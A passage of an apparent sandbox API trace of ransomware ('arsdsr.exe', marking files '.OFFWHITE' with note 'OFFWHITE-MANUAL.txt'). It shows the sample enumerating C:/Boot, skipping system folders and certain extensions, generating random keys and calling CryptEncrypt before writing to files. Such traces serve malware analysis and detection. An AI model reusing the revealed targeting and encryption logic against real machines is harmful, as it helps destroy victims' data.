lpString2="KERNEL32.DLL") returned 0 [0082.337] SystemFunction036 (in: RandomBuffer=0x548670, RandomBufferLength=0x10 | out: RandomBuffer=0x548670) returned 1 [0082.338] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.338] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.338] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x521bc0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x521bc0*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.338] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.338] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.338] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x521cc8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x521cc8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.338] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.339] SetLastError (dwErrCode=0x0) [0082.339] WriteFile (in: hFile=0xffffffff, lpBuffer=0x521bc0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.339] GetLastError () returned 0x6 [0082.339] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.339] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.339] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2=".") returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2="..") returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2="...") returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2="windows") returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2="$recycle.bin") returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2="rsa") returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2="ntuser.dat") returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2="programdata") returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2="appdata") returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2="program files") returned 1 [0082.339] lstrcmpiW (lpString1="zh-HK", lpString2="program files (x86)") returned 1 [0082.339] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.339] lstrcatW (in: lpString1="C:/Boot\\", lpString2="zh-HK" | out: lpString1="C:/Boot\\zh-HK") returned="C:/Boot\\zh-HK" [0082.339] lstrcatW (in: lpString1="C:/Boot\\zh-HK", lpString2="\\" | out: lpString1="C:/Boot\\zh-HK\\") returned="C:/Boot\\zh-HK\\" [0082.339] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\zh-HK\\" | out: lpString1="C:/Boot\\zh-HK\\") returned="C:/Boot\\zh-HK\\" [0082.339] lstrcatW (in: lpString1="C:/Boot\\zh-HK\\", lpString2="*.*" | out: lpString1="C:/Boot\\zh-HK\\*.*") returned="C:/Boot\\zh-HK\\*.*" [0082.339] FindFirstFileW (in: lpFileName="C:/Boot\\zh-HK\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.340] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.340] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.340] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.340] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.340] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.340] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.341] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\zh-HK\\" | out: lpString1="C:/Boot\\zh-HK\\") returned="C:/Boot\\zh-HK\\" [0082.341] lstrcatW (in: lpString1="C:/Boot\\zh-HK\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\zh-HK\\bootmgr.exe.mui") returned="C:/Boot\\zh-HK\\bootmgr.exe.mui" [0082.341] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.341] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.341] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.341] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.341] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.341] GetProcessHeap () returned 0x500000 [0082.341] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bcd0 [0082.341] CreateFileW (lpFileName="C:/Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.342] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.342] GetProcessHeap () returned 0x500000 [0082.342] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548688 [0082.342] GetProcessHeap () returned 0x500000 [0082.342] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5486a0 [0082.342] GetProcessHeap () returned 0x500000 [0082.342] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x523650 [0082.342] GetProcessHeap () returned 0x500000 [0082.342] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x523758 [0082.342] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.342] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.342] SystemFunction036 (in: RandomBuffer=0x548688, RandomBufferLength=0x10 | out: RandomBuffer=0x548688) returned 1 [0082.342] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.342] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.342] SystemFunction036 (in: RandomBuffer=0x5486a0, RandomBufferLength=0x10 | out: RandomBuffer=0x5486a0) returned 1 [0082.342] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.342] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.342] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x523650*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x523650*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.342] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.343] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.343] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x523758*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x523758*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.343] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.343] SetLastError (dwErrCode=0x0) [0082.343] WriteFile (in: hFile=0xffffffff, lpBuffer=0x523650, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.343] GetLastError () returned 0x6 [0082.343] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.343] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.343] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0082.343] lstrcmpiW (lpString1="zh-TW", lpString2=".") returned 1 [0082.343] lstrcmpiW (lpString1="zh-TW", lpString2="..") returned 1 [0082.343] lstrcmpiW (lpString1="zh-TW", lpString2="...") returned 1 [0082.343] lstrcmpiW (lpString1="zh-TW", lpString2="windows") returned 1 [0082.343] lstrcmpiW (lpString1="zh-TW", lpString2="$recycle.bin") returned 1 [0082.343] lstrcmpiW (lpString1="zh-TW", lpString2="rsa") returned 1 [0082.343] lstrcmpiW (lpString1="zh-TW", lpString2="ntuser.dat") returned 1 [0082.343] lstrcmpiW (lpString1="zh-TW", lpString2="programdata") returned 1 [0082.343] lstrcmpiW (lpString1="zh-TW", lpString2="appdata") returned 1 [0082.344] lstrcmpiW (lpString1="zh-TW", lpString2="program files") returned 1 [0082.344] lstrcmpiW (lpString1="zh-TW", lpString2="program files (x86)") returned 1 [0082.344] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.344] lstrcatW (in: lpString1="C:/Boot\\", lpString2="zh-TW" | out: lpString1="C:/Boot\\zh-TW") returned="C:/Boot\\zh-TW" [0082.344] lstrcatW (in: lpString1="C:/Boot\\zh-TW", lpString2="\\" | out: lpString1="C:/Boot\\zh-TW\\") returned="C:/Boot\\zh-TW\\" [0082.344] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\zh-TW\\" | out: lpString1="C:/Boot\\zh-TW\\") returned="C:/Boot\\zh-TW\\" [0082.344] lstrcatW (in: lpString1="C:/Boot\\zh-TW\\", lpString2="*.*" | out: lpString1="C:/Boot\\zh-TW\\*.*") returned="C:/Boot\\zh-TW\\*.*" [0082.344] FindFirstFileW (in: lpFileName="C:/Boot\\zh-TW\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.344] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.344] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.345] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.345] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.345] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.345] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.345] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\zh-TW\\" | out: lpString1="C:/Boot\\zh-TW\\") returned="C:/Boot\\zh-TW\\" [0082.345] lstrcatW (in: lpString1="C:/Boot\\zh-TW\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\zh-TW\\bootmgr.exe.mui") returned="C:/Boot\\zh-TW\\bootmgr.exe.mui" [0082.345] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.345] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.345] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.345] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.345] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.345] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.345] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.345] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.345] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.345] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.346] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.346] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.346] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.346] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.346] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.346] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.346] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.346] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.346] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.346] GetProcessHeap () returned 0x500000 [0082.346] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bd30 [0082.346] CreateFileW (lpFileName="C:/Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.346] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.346] GetProcessHeap () returned 0x500000 [0082.346] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5486b8 [0082.346] GetProcessHeap () returned 0x500000 [0082.346] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5486d0 [0082.346] GetProcessHeap () returned 0x500000 [0082.346] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x523860 [0082.346] GetProcessHeap () returned 0x500000 [0082.346] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x523968 [0082.346] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.346] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.347] SystemFunction036 (in: RandomBuffer=0x5486b8, RandomBufferLength=0x10 | out: RandomBuffer=0x5486b8) returned 1 [0082.347] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.347] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.347] SystemFunction036 (in: RandomBuffer=0x5486d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5486d0) returned 1 [0082.347] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.347] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.347] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x523860*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x523860*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.347] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.347] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.347] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x523968*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x523968*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.347] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.347] SetLastError (dwErrCode=0x0) [0082.347] WriteFile (in: hFile=0xffffffff, lpBuffer=0x523860, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.347] GetLastError () returned 0x6 [0082.347] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.348] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.348] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0082.348] FindClose (in: hFindFile=0x5446d0 | out: hFindFile=0x5446d0) returned 1 [0082.348] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2=".") returned 1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2="..") returned 1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2="...") returned 1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2="windows") returned -1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2="$recycle.bin") returned 1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2="rsa") returned -1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2="ntuser.dat") returned -1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2="programdata") returned -1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2="appdata") returned 1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2="program files") returned -1 [0082.348] lstrcmpiW (lpString1="bootmgr", lpString2="program files (x86)") returned -1 [0082.348] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0082.348] lstrcatW (in: lpString1="C:/", lpString2="bootmgr" | out: lpString1="C:/bootmgr") returned="C:/bootmgr" [0082.348] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.348] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.348] PathFindExtensionW (pszPath="bootmgr") returned="" [0082.348] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0082.348] lstrcmpiW (lpString1="", lpString2=".log") returned -1 [0082.348] lstrcmpiW (lpString1="", lpString2=".cab") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".cmd") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".com") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".cpl") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".ini") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".url") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".ttf") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".mp3") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".pif") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".mp4") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".OFFWHITE") returned -1 [0082.349] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0082.349] lstrcmpiW (lpString1="bootmgr", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.349] GetProcessHeap () returned 0x500000 [0082.349] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bd60 [0082.349] CreateFileW (lpFileName="C:/bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 